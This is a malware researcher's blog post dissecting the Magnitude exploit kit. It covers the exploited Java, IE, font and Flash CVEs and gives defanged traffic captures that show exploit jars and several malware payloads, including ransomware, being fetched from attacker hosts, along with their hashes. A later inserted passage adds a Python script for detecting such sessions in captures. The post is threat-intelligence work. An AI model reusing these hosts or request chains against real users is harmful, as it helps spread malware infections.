2013-10-26 - Study
Magnitude EK : Pop Pop !
Image: Magnitude
Magnitude is a community name chosen for an Exploit Kit previously referred to as "Popads".
Why Popads ?
For many days after it was first spotted, the drive-by was being done using malverts pushed via PopAds, and all landings were ending with popads.com.
Image: Magnitude 2013-03-22. Here the referer is sweerl.biz
PopAds being a legit company fighting against malverts, we had to choose a proper name.
As we don't know its real name (if it has one), a video proposed by Will Metcalf from Emerging Threats led to a consensus :
Community - Magnitude (Pop pop!)
Since Paunch's arrest we are seeing more and more Magnitude.
Image: User on an underground forum looking for Magnitude (^^) to grow his botnet. The world upside down.
Now let's see how it's "weaponized".
Disclaimer : as usual I may hide information on stuff that seems broken.
CVE-2013-2463 with click2play bypass :
Spotted inside on 2013-10-19, but it may have been there for 1 or 2 weeks.
Image: CVE-2013-2463 + c2p bypass in Magnitude 2013-10-25. After that the computer is...slightly infected.
200 OK (text/html)
Image: Magnitude landing - highlighted : the piece of code that won't be 404-rejected (UA based) with the configuration presented to the EK
GET http://khncudlm.7rahdeqi.info/80560ef3eddd08c9d455d41af5ea8592/cc84e758a3b4611de79628ee89895e13.swf
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/131548a8413b7f63f89dff19f8563a5e
200 OK (text/html) (this is for CVE-2013-2551 see later)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/28322e8e52bc381204f0b1e65c40e174
200 OK (text/html)
Image: jnlp for Click2Play bypass on jre17u21
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive) 1c3d690421a56c5c67e211d747df9b72
Image: Piece of CVE-2013-2463 in Magnitude jar
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0
200 OK (text/html) Payload 1 c2a974e04298b557f976818200c879ab Stitur Ransomware
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/1
200 OK (text/html) Payload 2 ba923eb3b0968a58a090db1e3079080d <- Redyms. Thx Kimberly (Stopmalvertising).
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/2
200 OK (text/html) Payload 3 f577eef07ef8331311f93fe1918c6cc6 Kelihos Spambot/loader
(Out of scope -- do :
85.255.57.253
GET /cuper02.exe HTTP/1.0 --> 004874bb466e6b8eb3dd7b09f7e3855d )
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/3
200 OK (text/html) Payload 4 (empty)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/4
200 OK (text/html) Payload 5 4903405b85b5584fa93a1e4591b80f64 Zaccess
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/5
200 OK (text/html) Payload 6 818f9ea202ce30645d2fb547ff1829f8 Vawtrak (Thx @virtualalloc for the information)
Note : 5 payloads...among which a ransomware...not sure the beneficiary(ies) of the other payloads would appreciate that, as after a ransomware the computer goes for cleaning. Explanation ? I would say the owner of this Magnitude thread is selling loads from the same traffic to different customers/affiliates.
CVE-2011-3402 :
The CVE is inside (see below) but I couldn't get it to fire as it's overlapping with CVE-2013-2551. I have some idea of how to trigger it. Will maybe update later.
CVE-2012-0507 :
I made the pass on the "ru8080" thread. (Ex : /news/ BH EK )
Image: CVE-2012-0507 pass in Magnitude
GET http://ilkbxnmtce.1deepinsget .info/?e15023ac04e9f62ad61f23a2439a9b1e=29
200 OK (text/html)
Image: Magnitude landing - 2013-10-25. Highlighted : the code that won't be UA 404-rejected. (3 jar calls (?) : <embed> for Firefox, <object> for IE ; <applet> has been deprecated)
GET http://ilkbxnmtce.1deepinsget .info/ff498283b05fd88b573e0cce15b22de5.eot
200 OK (application/vnd.ms-fontobject) CVE-2011-3402 <--
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/09c164f4b0f930b8c10c476ec5dbfbec.swf
404 Not Found (text/html)
GET http://ilkbxnmtce.1deepinsget.info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/8cc36c1a70beae826a15bb7df6ab5b1d
200 OK (text/html) CVE-2013-2551 (see later)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive) b075fbbe5e96e73a9a597062d6c01444
Image: Piece of CVE-2012-0507 in Magnitude jar
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/0
200 OK (text/html) Payload 1 148ae098e23c4844ce25990643cc4150 Stitur
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/1
200 OK (text/html) Payload2 empty
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/2
200 OK (text/html) Payload3 empty
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/3
200 OK (text/html) Payload4 empty
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/4
200 OK (text/html) Payload 5 07b8dafe506e56a40527b96722bf5c70
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/5
200 OK (text/html) Payload 6 empty
CVE-2013-2551 :
Inside since 2013-10-06
The first time I saw it, once decoded, it was a copy-paste of the code from HiMan EK (the kaf() function in HiMan had caught my attention for some reason).
Magnitude EK (formerly popads) has integrated CVE-2013-2551 yesterday. ( HiMan EK copy paste again :S ) pic.twitter.com/s0NslEokhf
— kafeine (@kafeine) October 7, 2013
I won't spend much time on that one.
GET http://tpwqihdqrb.2deepinsget .info/?103cacc2431cf5b7bec74b56d3a60444=n11&2550a61eab180c8cfd230ffc41bf33ee=google.com&26f72647ceaa00ff4e35ed5ee16cf9fa=[redacted].com
200 OK (text/html)
Image: Magnitude landing 2013-10-25. Highlighted : the code that will fire in this pass
GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/13cd72e17e6b22c976eeba91c2ab577a.swf
404 Not Found (text/html)
GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/6f1ed403773ad2b9dd44dc0fbcefadef
200 OK (text/html)
GET http://5.79.85 .237/?eade56046ab80efc3a5dd1dd83f78258
200 OK (text/html) Payload 1 : df1ada88e40a58da18dc4b408600e0a5 Winwebsec
(OT: do : 219.235.1.127 GET /api/dom/no_respond/?ts=8aad4fca6d94d7b467bbaed2d1747d2e5a1cb210&token=sysdocx1&group=asp&nid=264D4000&lid=0058&ver=0058&affid=76900&dx=0 HTTP/1.1 <-- FakeAV : Winwebsec )
GET http://5.79.85 .237/?4c9a37a894f9cee76c89df68f4c18615
200 OK (text/html) Payload 2 : 4b9c8466cae1da89923ac89eca79db2a (Kelihos Spambot)
GET http://5.79.85 .237/?8dc8e224de9248e8e1cb72ceac8a5599
200 OK (text/html) Payload 3 : 2188d6a0d622d23a9c9bb7208a9f388c (Kelihos Spambot ..again (?!?) )
GET http://5.79.85 .237/?28847bf8f7c082fcd967ac01dbaec03e
200 OK (text/html) Payload 4 (empty)
GET http://5.79.85 .237/?cf20e7e042371ed8b65339bbd931e8b3
200 OK (text/html) Payload 5 : 0ac65603f3519ac09187b35df203905f Zaccess
GET http://5.79.85 .237/?ac339e60d0e6eeb0e5a1caa4d11c2fe5
200 OK (text/html) Payload 6 (empty)
(In some configurations you can get the Java call...but most of the time you'll have an IE crash before that)
CVE-2013-0634 (?) :
If so, inside since at least 2013-03-22.
Image: CVE-2013-0634 (?) CVE path
GET http://vedktnyo.3deepinsget .info/?c372e0cf1d9e9ec9b56349796a1ceb22=34
200 OK (text/html)
GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/100b9090c5f6d6577b33fb8ece0c4d45.swf
200 OK (application/x-shockwave-flash) 3f4261ccc6edb559e623906472d5cd2f So CVE-2013-0634 (?)...Can't figure this out for sure. Help would be greatly appreciated :)
Sample and Associated Fiddler (Owncloud)
GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/882173c54e09bf0968cbda6b32c1d145
200 OK (text/html) CVE-2013-2551 (see before)
GET http://gabetiznol .info/calculator.exe
200 OK (text/html) aeaf204a9e5e6dd55d2a85ae1b7a0dd1
------
Off Topic Payload :
74.86.20.50 http://twinkcam .net/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
36351 | 74.86.0.0/16 | SOFTLAYER | US | SOFTLAYER.COM | SOFTLAYER TECHNOLOGIES INC.
216.17.105.36 http://cinnamyn .com/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
30266 | 216.17.104.0/21 | A1COLO-COM | US | A1COLO.COM | A1COLO.COM
74.86.20.50 http://saggerboy .com/twg/b.php?id=92.1
User-Agent: Mozilla
Want to know more? S!ri's posts about it
--------
<edit1 2013-11-07>
After around 8 hours of maintenance during which the thread links were replying with a "stoptraff", Magnitude is back with small changes.
Image: Magnitude landing change on 2013-11-07
Exploitation Graph :
Image: Magnitude exploitation graph 2013-10-26
To simplify : no plugin detection. Your browser is told to fetch all the bullets...those that do not fit (server-side User-Agent check) are then refused to it with a 404.
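As an added illustration of that behaviour (my own triage script, not code from the original post or from the kit), the following Python parses a capture in the GET / status layout used above, groups requests by the 32-hex session directory, and flags sessions where the numeric payload slots (/0, /1, ...) come back 200 text/html while the rejected bullets show as 404s. The sample trace, host and hashes are constructed, not the ones from the post.

```python
import re
from collections import defaultdict

# Constructed sample in the same GET / status layout as the captures above (made-up host/hashes).
SAMPLE_TRACE = """\
GET http://abcdefgh.example.info/?0123456789abcdef0123456789abcdef=29
200 OK (text/html)
GET http://abcdefgh.example .info/ffffffffffffffffffffffffffffffff/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.swf
404 Not Found (text/html)
GET http://abcdefgh.example .info/ffffffffffffffffffffffffffffffff/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
200 OK (text/html)
GET http://abcdefgh.example .info/ffffffffffffffffffffffffffffffff/0
200 OK (text/html)
GET http://abcdefgh.example .info/ffffffffffffffffffffffffffffffff/1
200 OK (text/html)
"""

REQ = re.compile(r"^GET\s+(.*)$")
RESP = re.compile(r"^(\d{3})\s+[^(]*\((\S+?)\)")
SESSION = re.compile(r"^https?://([^/]+)/([0-9a-f]{32})/([^/?]+)$")  # /<32 hex>/<name>

def parse_trace(text):
    # Pair each GET line with the status line that follows it: (url, status, content-type).
    pairs, url = [], None
    for line in text.splitlines():
        m = REQ.match(line)
        if m:
            url = m.group(1).replace(" ", "")  # undo "host .info" style defanging
            continue
        m = RESP.match(line)
        if m and url:
            pairs.append((url, int(m.group(1)), m.group(2)))
            url = None
    return pairs

def find_magnitude_sessions(pairs, min_payloads=2):
    """Flag session dirs where numeric slots (/0, /1, ...) come back 200 text/html."""
    stats = defaultdict(lambda: {"payload_slots": set(), "rejected": 0, "served": 0})
    for url, status, ctype in pairs:
        m = SESSION.match(url)
        if not m:
            continue
        host, sess, name = m.groups()
        s = stats[(host, sess)]
        if name.isdigit() and status == 200 and ctype == "text/html":
            s["payload_slots"].add(int(name))   # payload slot served as "text/html"
        elif status == 404:
            s["rejected"] += 1                  # bullet refused by the server-side UA check
        elif status == 200:
            s["served"] += 1                    # exploit file that did fit the UA
    return {k: v for k, v in stats.items() if len(v["payload_slots"]) >= min_payloads}
```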
<edit 2014-02-06> "I may hide information on stuff that seems broken" : CVE-2013-0634 was only a downloader. I couldn't figure out if the owner was aware of it or had been tricked by a hypothetical hired coder...so I decided to hide that to avoid helping.</edit>
Thanks : Chris Wakelin and Will Metcalf
Post Publication Reading by Spiderlabs :
1st Magnitude blog: http://blog.spiderlabs.com/2014/08/a-peek-into-the-lions-den-the-magnitude-aka-popads-exploit-kit.html
2nd Magnitude blog on the Backend Infrastructure Insight I: http://blog.spiderlabs.com/2014/08/magnitude-exploit-kit-backend-infrastructure-insight-part-i.html
3rd Magnitude blog on the Backend Infrastructure Insight II: http://blog.spiderlabs.com/2014/11/magnitude-exploit-kit-backend-infrastructure-insight-part-ii.html
4th Magnitude blog on the Backend Infrastructure Insight III: http://blog.spiderlabs.com/2014/12/magnitude-exploit-kit-backend-infrastructure-insight-part-iii.html